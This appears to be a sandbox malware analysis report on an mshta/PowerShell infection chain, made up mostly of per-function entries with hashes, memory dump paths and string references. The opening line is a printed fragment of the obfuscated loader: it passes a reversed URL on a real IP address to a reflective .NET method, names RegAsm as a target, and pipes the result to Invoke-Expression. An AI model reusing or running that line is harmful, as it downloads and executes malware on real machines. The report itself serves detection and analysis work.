[dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"
Imagebase:	0x20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 06030FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2053859768.0000000006030000.00000010.00000800.00020000.00000000.sdmp, Offset: 06030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6030000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 6a3ddead0676b9213332815f6c6907e7fd17342c8eebad8a06a1f752641d0d71
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06030FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2053859768.0000000006030000.00000010.00000800.00020000.00000000.sdmp, Offset: 06030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6030000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 6a3ddead0676b9213332815f6c6907e7fd17342c8eebad8a06a1f752641d0d71
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06030FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2053859768.0000000006030000.00000010.00000800.00020000.00000000.sdmp, Offset: 06030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6030000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 6a3ddead0676b9213332815f6c6907e7fd17342c8eebad8a06a1f752641d0d71
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 6720, Parent PID: 5320COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	48
Total number of Limit Nodes:	7

Executed Functions

Function 02A37A18 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2185583253.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea03197f026fd901fbedf95d49bef20804c1c160e603bc44c92acdc3a231ccbf
Instruction ID: ac93f94a8cff5fc6146ab61cbd9cfd1a0db1268edf8f75d5a5be6e45600d71cd
Opcode Fuzzy Hash: ea03197f026fd901fbedf95d49bef20804c1c160e603bc44c92acdc3a231ccbf
Instruction Fuzzy Hash: 4EE109B5A00219EFDB05DF98D984A9EFBB6FF48310F248159F805AB365CB35AD41CB90

Function 07101F40 Relevance: 5.6, Strings: 4, Instructions: 579
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 071023D8
4']q, xrefs: 0710227E
4']q, xrefs: 071023E2
4']q, xrefs: 07102288

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: f9f7a2c4fd958a1f277ea9e5366b7c286022062b7f32ff0aca607d6e00ac301b
Instruction ID: 297ccc9699677b6de6bcb8ff9d71240f2769e68688f0610166c797069df74a5f
Opcode Fuzzy Hash: f9f7a2c4fd958a1f277ea9e5366b7c286022062b7f32ff0aca607d6e00ac301b
Instruction Fuzzy Hash: 7B126AB17043169FCB169B78881876ABBA6AFD6310F15847AD905CF3C1DBB1C846C7E2

Function 07104610 Relevance: 2.9, Strings: 2, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 07104652
tP]q, xrefs: 07104648

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: e8b1b45561536dc241fdd7b935b337385524c8461f13ac6326b6d73e2158250d
Instruction ID: 1bd3cbb7d9a35ee4db402f56c194bd745ad7b5ef990251e34c26f5af6fcbb75f
Opcode Fuzzy Hash: e8b1b45561536dc241fdd7b935b337385524c8461f13ac6326b6d73e2158250d
Instruction Fuzzy Hash: 8BF129B4B002559FCB159F68C490B2ABBA2EFC9710F258469ED059B3D0DBB1DC45CBE1

Function 071004F8 Relevance: 2.7, Strings: 2, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 0710058A
tP]q, xrefs: 0710057E

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 07afcb435c08dd41bc58ba5f95e1d4c7bee6237f821652ace470e68f185fc066
Instruction ID: 858e09d65cfde51ad8ffd21920eca495022dcda321168a79c418b056402fa28d
Opcode Fuzzy Hash: 07afcb435c08dd41bc58ba5f95e1d4c7bee6237f821652ace470e68f185fc066
Instruction Fuzzy Hash: 085146B0704214AFC7159B688850B2ABBF6EFC9710F15886AE989DF3D1CBB18C45C7E1

Function 02A31BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 02A37E99

Memory Dump Source

Source File: 00000003.00000002.2185583253.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a30000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 84bff357392940905576cd940ccd56a4c5dfeb549d902f9da35ac58b82b95eb1
Instruction ID: 847d37d8881c6d4819f302c7706a3b0cd2ba34cf322cb9f1a7939f51118a8620
Opcode Fuzzy Hash: 84bff357392940905576cd940ccd56a4c5dfeb549d902f9da35ac58b82b95eb1
Instruction Fuzzy Hash: 3F21F3B5D01259DFCB00DF9AD984A9EFBF4FF48310F20812AE918A7210D774AA50CFA0

Function 071045F5 Relevance: 1.5, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 07104648

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: tP]q
API String ID: 0-2175968468
Opcode ID: 3fcbc1994bc62fff5d6537112224e9eee94a8a3d26d95d7ce2b8c019d9870094
Instruction ID: 884fa4a89d1cc3cafb0ef7cf27a29e0c90cbe51e256a47f004632b6c421b2a0c
Opcode Fuzzy Hash: 3fcbc1994bc62fff5d6537112224e9eee94a8a3d26d95d7ce2b8c019d9870094
Instruction Fuzzy Hash: A191D2B4A002459FCB19CF58C480B69BBB2FB8A710F258469EE059B3D4DBB1EC45CBD1

Function 07101F37 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88394ee3efbc97b3a60c85773aa48af30ee606277502544cc879134755e2b407
Instruction ID: 3ce2618c4adf33344ae66c5f7c0d2e06a2d75204465b8e230c1f2a2637c736dd
Opcode Fuzzy Hash: 88394ee3efbc97b3a60c85773aa48af30ee606277502544cc879134755e2b407
Instruction Fuzzy Hash: F03103F0B04306DFCB25CF148A89A697BA2BF80700F5A80A5DA049F3C5D7B6D885C7E1

Function 071005F0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f852ab1406aaa17c2ad6484d9b4afc84f447fa465c78bc10ff2707bc5aab9acb
Instruction ID: c34fffc1c7ab43594fdfe7405e140fd624f7b990a70c3e83d3131b418321afb7
Opcode Fuzzy Hash: f852ab1406aaa17c2ad6484d9b4afc84f447fa465c78bc10ff2707bc5aab9acb
Instruction Fuzzy Hash: 8F0199743003102BD7205A6E8905B2F7AA7AFD5B10F50C428F548EB3C0DAB69D4443F5

Function 071005ED Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def682f77df1d18ded90933bde6d8c1a7ddff105459254fd2e7057ba39398ae9
Instruction ID: 1005e7fe1c1b806eed2f79fe14ccf40232e1acc200c3030ae09ec78185e638ae
Opcode Fuzzy Hash: def682f77df1d18ded90933bde6d8c1a7ddff105459254fd2e7057ba39398ae9
Instruction Fuzzy Hash: E40199743403106BE7205A6E4915B2F7AE3AFD5B10F20C429F548EB3D4DAB69D4543B1

Function 0292D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2184995963.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b2b0bd4e0675f92e7bf060495304e3b731b0c5709281487b71f19cef7b3179
Instruction ID: 44c0aaa03643e9de14a4c21e99e09fc326d740ed9927a5596e08b84252fc623b
Opcode Fuzzy Hash: 46b2b0bd4e0675f92e7bf060495304e3b731b0c5709281487b71f19cef7b3179
Instruction Fuzzy Hash: 66012B31045310DEE7208A26CD84B67BF9CEF45324F18C429ED484B25AC3799849C6F1

Function 0292D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2184995963.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98e9ae95f05e947f70d68b253fb5b55365d6671f2bd71fa654d08fbd80c8d0dc
Instruction ID: d81d4fcdf565968c5a5bfa386bbcad76b4060f5eadffe3e607fdc7bf3c522355
Opcode Fuzzy Hash: 98e9ae95f05e947f70d68b253fb5b55365d6671f2bd71fa654d08fbd80c8d0dc
Instruction Fuzzy Hash: 1501407104E3D09ED7128B258894756BFB8EF47224F1DC1DBD9888F1A7C2699849C772

Non-executed Functions

Function 07100FD8 Relevance: 11.7, Strings: 9, Instructions: 474COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0710149C
4']q, xrefs: 07101336
tP]q, xrefs: 071011D3
tP]q, xrefs: 071014A8
4']q, xrefs: 0710132A
4']q, xrefs: 0710107E
tP]q, xrefs: 071011DF
4']q, xrefs: 07101088
$]q, xrefs: 0710140C

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
API String ID: 0-3647279530
Opcode ID: 9157c2c9b38b17e8f2864b9749ff466d1d36fefd13584b8c0d76ad15f2bd19f9
Instruction ID: 84a23044470c521306e2b8bec2d0935aa1d1a130b3c8c25fa8842ae898e6dbce
Opcode Fuzzy Hash: 9157c2c9b38b17e8f2864b9749ff466d1d36fefd13584b8c0d76ad15f2bd19f9
Instruction Fuzzy Hash: 35F149B070434AAFC7268B78981076EBFB6AFC6310F15847AD545CB2D1DBB98845C7E2

Function 07100B70 Relevance: 11.6, Strings: 9, Instructions: 378COMMON

Download Yara Rule

Strings

4']q, xrefs: 07100DB6
$]q, xrefs: 07100BA8
4']q, xrefs: 07100DC0
$]q, xrefs: 07100B82
tP]q, xrefs: 07100BF9
tP]q, xrefs: 07100F24
tP]q, xrefs: 07100BED
tP]q, xrefs: 07100F30
$]q, xrefs: 07100BB4

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-1965711582
Opcode ID: 1b6ddcb70cc10b217d357bb8892012c484917bc5f3d8be3210243711d26e0beb
Instruction ID: 551e7a7a5d95123535fe78edc2845984a7bf979f0944b2f31a391b8ddff6b861
Opcode Fuzzy Hash: 1b6ddcb70cc10b217d357bb8892012c484917bc5f3d8be3210243711d26e0beb
Instruction Fuzzy Hash: 27C178B17143068FC7268B68881076ABBE6EFCA710F1584BAE845DB3D1DBB1D845C3E1

Function 071015A8 Relevance: 6.4, Strings: 5, Instructions: 120COMMON

Download Yara Rule

Strings

$]q, xrefs: 071015E0
tP]q, xrefs: 07101625
tP]q, xrefs: 07101631
$]q, xrefs: 071015BA
$]q, xrefs: 071015EC

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-1831577214
Opcode ID: 2c83c0e797c9d16d15a1c675e112d588b651e06ca85dea6216bf7a446ae3e667
Instruction ID: 9391ed3f9f445a40be25d8aa4baed664e97863cd286a36c1c360e9fdcf77a943
Opcode Fuzzy Hash: 2c83c0e797c9d16d15a1c675e112d588b651e06ca85dea6216bf7a446ae3e667
Instruction Fuzzy Hash: 743119763043599FD7198B7D984052ABFF5AF82720B2984ABD445CB3D2CBB5DC04C7A1

Function 07103D30 Relevance: 5.3, Strings: 4, Instructions: 252COMMON

Download Yara Rule

Strings

4']q, xrefs: 07103DE2
4']q, xrefs: 07103F77
4']q, xrefs: 07103F83
4']q, xrefs: 07103DD6

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 81c7126535dbc1cda0069c86d7896cdcbe7e5149f5537702f8ccd5f55d8345f1
Instruction ID: 7ff5874adb5e51ebd85184c1995738148b63f03c137bfcba4e9343fc03bed728
Opcode Fuzzy Hash: 81c7126535dbc1cda0069c86d7896cdcbe7e5149f5537702f8ccd5f55d8345f1
Instruction Fuzzy Hash: 348157B0B04205DFCB1A9F68D4446AABBF6EF86210F1480BED465CB2D1DB71C845C7E2

Function 07103550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 071035B8
$]q, xrefs: 07103562
$]q, xrefs: 0710357E
$]q, xrefs: 071035AC

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 17a807cbf084df319188fae8fada475f2f007dab5e560bc273f1a5efadb43b9a
Instruction ID: 87ff07478afc71a8c1722dfd6cc2ebf6ef90d3cea9d8ad5718cac978cfbc812e
Opcode Fuzzy Hash: 17a807cbf084df319188fae8fada475f2f007dab5e560bc273f1a5efadb43b9a
Instruction Fuzzy Hash: 6E218BB53103025BDB29966E8840B37BAEA9BC1711F21843EA815CB3D1DFB2C90183A1

Function 07100081 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

4']q, xrefs: 071000EB
$]q, xrefs: 071000CA
4']q, xrefs: 071000F7
$]q, xrefs: 071000D6

Memory Dump Source

Source File: 00000003.00000002.2190521375.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7100000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 62041f22e63e0871eb7d39abb9312da9f38be730109939fe3bacc57a8e0121f3
Instruction ID: dccaadf6667f474adc08442186e029df8c3a94259d5a38771db51720e273ec93
Opcode Fuzzy Hash: 62041f22e63e0871eb7d39abb9312da9f38be730109939fe3bacc57a8e0121f3
Instruction Fuzzy Hash: 74016D7170D3D54FC72B162D18302296FB66F87A9072B44E7C4C1DF2DBCAA98D4983A6

Analysis Process: powershell.exePID: 6548, Parent PID: 768COMMON

Executed Functions

Function 02C8D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3067708679.0000000002C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913a9c8ade6c74c87e36e02c17565bc57067e44121b124e6e1f7fbfb5c411285
Instruction ID: 8d8dd5c096476d64e6a200d11aa80bc31d001579b0dcf596167370065c23aa00
Opcode Fuzzy Hash: 913a9c8ade6c74c87e36e02c17565bc57067e44121b124e6e1f7fbfb5c411285
Instruction Fuzzy Hash: A201406140E3D09ED7128B358C94752BFB4DF47224F1DC1DBD9888F1A3C2695845C7B2

Function 02C8D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3067708679.0000000002C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5298649cee04c796a15a48f357eb497fb7d4584a8f4903b9fb1f3a36e5c0cc
Instruction ID: 219eae8d7dc0da00599aca6544422a8a9b2ef4e1a0b1248e8fcdaf8cc33f76c7
Opcode Fuzzy Hash: 6b5298649cee04c796a15a48f357eb497fb7d4584a8f4903b9fb1f3a36e5c0cc
Instruction Fuzzy Hash: F701F7314043049AD720AA36CD84B67BF98EF86328F18C429ED4A0B286C7799941C7F1

Function 02D83026 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b580bf76b76d92016a230334c10217e0fcc2a760d4bfb30d00629a0dbf9d4749
Instruction ID: 5bbf3eb1b7421d4955bac6c079792c8d53e2f067e42b8c8a24b541347c0cebc9
Opcode Fuzzy Hash: b580bf76b76d92016a230334c10217e0fcc2a760d4bfb30d00629a0dbf9d4749
Instruction Fuzzy Hash: 80F0B735A001059FCB15CF9DD990AEEF7B1FF88324F208159E515A72A1C736AD52CB50

Non-executed Functions

Function 02D80FED Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd03d04060cd0e56d6760dd063f17a3e7d4c6d49a872dae2b716ce27ebea9e4a
Instruction ID: 557e2b70a36bc2da555b3a1d0229b66b47795e5f4f2110b2aecaae24959fb83f
Opcode Fuzzy Hash: cd03d04060cd0e56d6760dd063f17a3e7d4c6d49a872dae2b716ce27ebea9e4a
Instruction Fuzzy Hash: B071141299E3E02FE303677C9872BC53F61AF43214F5A51D3C5C48F9E796888809C3AA

Function 02D81364 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a00f28c3fe0fc87e7ba57fd89a85b1a3ace66d404ab7a208b67d8e75e40bd
Instruction ID: 0c5f84922ad1b6c4b9360f9eb369891b4ac03515bb63b1ce51511442e6406f89
Opcode Fuzzy Hash: 445a00f28c3fe0fc87e7ba57fd89a85b1a3ace66d404ab7a208b67d8e75e40bd
Instruction Fuzzy Hash: DB31E14280FBD22FD717933898B54987F70AD53168B2E05DBC4D0CF9A3D508A96EC3A6

Function 02D8180F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253962001403ebfbbd8aa2d8610eadd421ee9c24feac861169a233179a13a512
Instruction ID: 347a006006a0414c630ff0a313a9717f9e555b1cf0d0f66d3f759886e46383d1
Opcode Fuzzy Hash: 253962001403ebfbbd8aa2d8610eadd421ee9c24feac861169a233179a13a512
Instruction Fuzzy Hash: 5F21BF0144DBEA3BD31AB77CA8641D47FA4AD8227472806EAC4C0CB6A3D78AD51EC3D1

Function 02D81D62 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b326b9e34a14399f907835716c2aeb46dbf515e57622cf34c326379ab0fcc4
Instruction ID: 4aed7ba0500adf760d34e7c3928489a9e0aaffe50c779cb0f0ec8513eceb35dd
Opcode Fuzzy Hash: 77b326b9e34a14399f907835716c2aeb46dbf515e57622cf34c326379ab0fcc4
Instruction Fuzzy Hash: 6C31D70244E7E11FD303A33898A95D47FB09E83164B4E86DBC0C4CF0E3EA49885AC3A2

Function 02D8186D Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bc68ceac9542e7b118e479283d4ef076dfbc5065a9d07c08fbe2dfc1e2fd7b
Instruction ID: d3b085d0e14a36446ebfdaf8ff9a2d7d367550ec9b89891008bda31c2c0a000d
Opcode Fuzzy Hash: 23bc68ceac9542e7b118e479283d4ef076dfbc5065a9d07c08fbe2dfc1e2fd7b
Instruction Fuzzy Hash: 6811BE1145DFFA37D306BA7CE9644D87F84AE9223872807AAC4C0CB663D685E21DC3D8

Function 02D81CCB Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3068235813.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b2d84f305dc25bcb5c29df563b9f67cb0824716809d228c2d4b61145a4bad0
Instruction ID: ade177775061a3705866dbc2657d2681a5635caf904a37587bbc92ef4af47904
Opcode Fuzzy Hash: 84b2d84f305dc25bcb5c29df563b9f67cb0824716809d228c2d4b61145a4bad0
Instruction Fuzzy Hash: 6911000145EBD22FC30BA33898656947F706E83164F5E82D7C4C4CF1E7AA49991BC3A2

Analysis Process: powershell.exePID: 3092, Parent PID: 6548COMMON

Executed Functions

Function 07983AF0 Relevance: 21.3, Strings: 16, Instructions: 1291COMMON

Download Yara Rule

Strings

4']q, xrefs: 07984011
4']q, xrefs: 07984245
4']q, xrefs: 07983D78
4']q, xrefs: 07984005
tP]q, xrefs: 07983ED0
4']q, xrefs: 079848F1
4']q, xrefs: 07984251
tP]q, xrefs: 079841C2
tP]q, xrefs: 07983EC4
(aq, xrefs: 07984376
4']q, xrefs: 07983D6E
4']q, xrefs: 079848E5
$]q, xrefs: 0798451D
4']q, xrefs: 07984680
tP]q, xrefs: 079841B6
4']q, xrefs: 0798468A

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: (aq$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
API String ID: 0-3870498680
Opcode ID: 7d6a6f004cfb787857c0fae3668a9d47184daedbf3d3301f3220c235c1832b4f
Instruction ID: daf3242bb581f6c85da3006470b49fdd4a2c2a2fe61e5efa21d986e6407aa50b
Opcode Fuzzy Hash: 7d6a6f004cfb787857c0fae3668a9d47184daedbf3d3301f3220c235c1832b4f
Instruction Fuzzy Hash: 699279B17043868FCB55AF68C81076ABBEAAFC2618F14C4BBD445CF362DA35C845C7A1

Function 07980458 Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

$]q, xrefs: 07980578
$]q, xrefs: 07980516
4']q, xrefs: 0798059F
$]q, xrefs: 0798056C
4']q, xrefs: 07980593

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 3980e7887cca6adecad8401a52184a69cabce010d6ebc8c3ef461793099ddb10
Instruction ID: df3cd031a290f6e05953e388ea77b5c6ca9307352a12a94a90f98a459696136d
Opcode Fuzzy Hash: 3980e7887cca6adecad8401a52184a69cabce010d6ebc8c3ef461793099ddb10
Instruction Fuzzy Hash: 1C5147F07042068FCBA4AB7ED41067A7BA9AFC2318F14867AD845CB396DA35C949C771

Function 079822E0 Relevance: 5.7, Strings: 4, Instructions: 664COMMON

Download Yara Rule

Strings

4']q, xrefs: 07982628
4']q, xrefs: 0798261E
4']q, xrefs: 07982782
4']q, xrefs: 07982778

Memory Dump Source

Source File: 00000009.00000002.3065030363.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7980000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: fa5aab459f3161c68a70771c48798461ca5ab1ea74ee01d374e89d9c24d187eb
Instruction ID: 25a51ed63d6fde45138746a3b6b234833478c591011a9d4863c4d21d2a1ab455
Opcode Fuzzy Hash: fa5aab459f3161c68a70771c48798461ca5ab1ea74ee01d374e89d9c24d187eb
Instruction Fuzzy Hash: 902269B17043028FCB55AB68991077ABBEAFFD2318F1484BAC505CF352DA32D946C7A1

Function 07980447 Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

